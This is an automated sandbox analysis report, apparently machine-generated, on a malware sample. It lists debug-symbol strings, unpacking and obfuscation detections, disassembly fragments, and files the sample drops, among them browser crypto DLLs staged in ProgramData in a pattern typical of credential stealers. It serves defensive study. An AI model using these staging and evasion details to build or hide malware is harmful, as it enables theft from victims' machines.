                            Source: Binary string: wntdll.pdb source: Qg_Appv5.exe, 0000000D.00000002.1448048593.0000000005170000.00000004.00000800.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1426785944.0000000003140000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1386928542.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388922444.00000000044D0000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475980703.0000000003828000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1477591260.0000000003B80000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1480438511.000000000403F000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713172266.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713421487.00000000053D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: mozglue.pdb source: u48o.0.exe, 0000000A.00000002.1716466376.000000006C26D000.00000002.00000001.01000000.00000016.sdmp
                            Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: Qg_Appv5.exe, 0000000D.00000002.1455543827.000000000701F000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1385724944.00000000009AC000.00000002.00000001.01000000.0000000E.sdmp, UniversalInstaller.exe, 00000012.00000003.1381447513.00000000048E4000.00000004.00000001.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000000.1373724889.00000000009AC000.00000002.00000001.01000000.0000000E.sdmp, UniversalInstaller.exe, 00000014.00000000.1384104733.0000000000A3C000.00000002.00000001.01000000.00000010.sdmp, UniversalInstaller.exe, 00000014.00000002.1472732421.0000000000A3C000.00000002.00000001.01000000.00000010.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Telemetry\obj\Release\Telemetry.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2675924617.00000256731F0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: y:C:\xinosa dulicados52\vogewaxupi\gixugajipak20\n.pdb source: zLwT7vCojz.exe, 00000000.00000003.1290625421.0000000005EB1000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000000.1288578944.000000000040F000.00000002.00000001.01000000.00000005.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb^ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UIxMarketPlugin.pdb source: Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000006E8E000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2515162487.00000256581F0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000006B80000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1389721607.000000006C947000.00000002.00000001.01000000.0000000F.sdmp, UniversalInstaller.exe, 00000014.00000002.1484091250.000000006C947000.00000002.00000001.01000000.00000013.sdmp
                            Source: Binary string: C:\yokirew38_tidamikip hopoyura.pdb source: zLwT7vCojz.exe, 00000000.00000002.1558401422.00000000043E6000.00000004.00000020.00020000.00000000.sdmp, zLwT7vCojz.exe, 00000000.00000000.1249880380.000000000040F000.00000002.00000001.01000000.00000003.sdmp
                            Source: Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_en-us\obj\Release\Locale_en-us.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2516504389.00000256583D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: C:\xinosa dulicados52\vogewaxupi\gixugajipak20\n.pdb source: zLwT7vCojz.exe, 00000000.00000003.1290625421.0000000005EB1000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000000.1288578944.000000000040F000.00000002.00000001.01000000.00000005.sdmp
                            Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2515303312.0000025658200000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ko-kr\obj\Release\Locale_ko-kr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdbF source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb. source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_it-it\obj\Release\Locale_it-it.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2516000177.00000256583C0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2515303312.0000025658200000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2516000177.00000256583C0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ja-jp\obj\Release\Locale_ja-jp.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: wntdll.pdbUGP source: Qg_Appv5.exe, 0000000D.00000002.1448048593.0000000005170000.00000004.00000800.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1426785944.0000000003140000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1386928542.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388922444.00000000044D0000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475980703.0000000003828000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1477591260.0000000003B80000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1480438511.000000000403F000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713172266.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713421487.00000000053D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: /_/obj/Release/TelemetryChannel/net452/Microsoft.AI.ServerTelemetryChannel.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676321887.0000025673230000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2620487343.0000025669C2C000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdbR source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: nss3.pdb source: u48o.0.exe, 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: 0C:\yokirew38_tidamikip hopoyura.pdb source: zLwT7vCojz.exe, 00000000.00000002.1558401422.00000000043E6000.00000004.00000020.00020000.00000000.sdmp, zLwT7vCojz.exe, 00000000.00000000.1249880380.000000000040F000.00000002.00000001.01000000.00000003.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_zh-tw\obj\Release\Locale_zh-tw.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp

                            Data Obfuscation

                            barindex
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeUnpacked PE file: 0.2.zLwT7vCojz.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeUnpacked PE file: 10.2.u48o.0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeUnpacked PE file: 0.2.zLwT7vCojz.exe.400000.0.unpack
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeUnpacked PE file: 10.2.u48o.0.exe.400000.0.unpack
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_00416240
                            Source: relay.dll.13.drStatic PE information: real checksum: 0x18dd31 should be: 0x191202
                            Source: pfswlxy.22.drStatic PE information: real checksum: 0x0 should be: 0xc94c3
                            Source: relay.dll.18.drStatic PE information: real checksum: 0x18dd31 should be: 0x191202
                            Source: zLwT7vCojz.exeStatic PE information: real checksum: 0x79e57 should be: 0x79e5d
                            Source: u48o.1.exe.0.drStatic PE information: section name: .didata
                            Source: Qg_Appv5.exe.0.drStatic PE information: section name: .didata
                            Source: freebl3.dll.10.drStatic PE information: section name: .00cfg
                            Source: freebl3[1].dll.10.drStatic PE information: section name: .00cfg
                            Source: mozglue.dll.10.drStatic PE information: section name: .00cfg
                            Source: mozglue[1].dll.10.drStatic PE information: section name: .00cfg
                            Source: msvcp140.dll.10.drStatic PE information: section name: .didat
                            Source: msvcp140[1].dll.10.drStatic PE information: section name: .didat
                            Source: nss3.dll.10.drStatic PE information: section name: .00cfg
                            Source: nss3[1].dll.10.drStatic PE information: section name: .00cfg
                            Source: softokn3.dll.10.drStatic PE information: section name: .00cfg
                            Source: softokn3[1].dll.10.drStatic PE information: section name: .00cfg
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_0042D355 push esi; ret 0_2_0042D35E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_00409D06 push ecx; ret 0_2_00409D19
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_004275A4 push eax; ret 0_2_004275C2
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_004097B6 push ecx; ret 0_2_004097C9
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_04341CA2 push dword ptr [esp+ecx-75h]; iretd 0_2_04341CA6
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_0433C52F push esp; retf 0_2_0433C537
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_04329F6D push ecx; ret 0_2_04329F80
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_0434780B push eax; ret 0_2_04347829
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_04329A1D push ecx; ret 0_2_04329A30
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_0433CB2D push esp; retf 0_2_0433CB2E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_043B34F0 push ebp; iretd 0_2_043B3523
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_043B1767 push 2B991403h; ret 0_2_043B176E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_043B208C push 00000061h; retf 0_2_043B2094
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_043AF1CE pushad ; retf 0_2_043AF1CF
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_043B1A7D pushad ; retf 0_2_043B1A84
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_043B0258 push ecx; iretd 0_2_043B026A
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_004176C5 push ecx; ret 10_2_004176D8
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C22B536 push ecx; ret 10_2_6C22B549
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 13_2_0043FA1C push ecx; mov dword ptr [esp], edx13_2_0043FA1E
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 13_2_00412A45 push edx; ret 13_2_00412A94
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 13_2_0041264E push ebx; ret 13_2_0041266C
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 13_2_00412E53 push ecx; ret 13_2_00412E54
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 13_2_00412E55 push es; iretd 13_2_00412E62
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 13_2_00412C5B push edx; ret 13_2_00412C5C
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 13_2_00412E63 push ebx; ret 13_2_00412E6C
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 13_2_0041266D push es; ret 13_2_0041267A
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 13_2_00412E6D push edx; ret 13_2_00412E78
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 13_2_00412E7E push edx; ret 13_2_00412E80
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 13_2_00412A01 push edx; ret 13_2_00412A14
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 13_2_00412609 push edi; ret 13_2_00412614
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 13_2_00412C09 push ebx; ret 13_2_00412C1C
                            Source: pfswlxy.22.drStatic PE information: section name: .text entropy: 6.816878789485625
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeFile created: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\msvcp140[1].dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\vcruntime140[1].dllJump to dropped file
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeFile created: C:\Users\user\AppData\Local\Temp\u48o.0.exeJump to dropped file
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeFile created: C:\Users\user\AppData\Local\Temp\u48o.1.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\softokn3[1].dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\freebl3[1].dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\pfswlxyJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeFile created: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\wyftaheqJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeFile created: C:\Users\user\AppData\Roaming\driverRemote_debug\UIxMarketPlugin.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeFile created: C:\Users\user\AppData\Local\Temp\driverRemote_debug\relay.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\nss3[1].dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mozglue[1].dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeFile created: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UIxMarketPlugin.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeFile created: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeFile created: C:\Users\user\AppData\Roaming\driverRemote_debug\relay.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\pfswlxyJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\wyftaheqJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo ApplicationsJump to behavior

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\PFSWLXY
                            Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\WYFTAHEQ
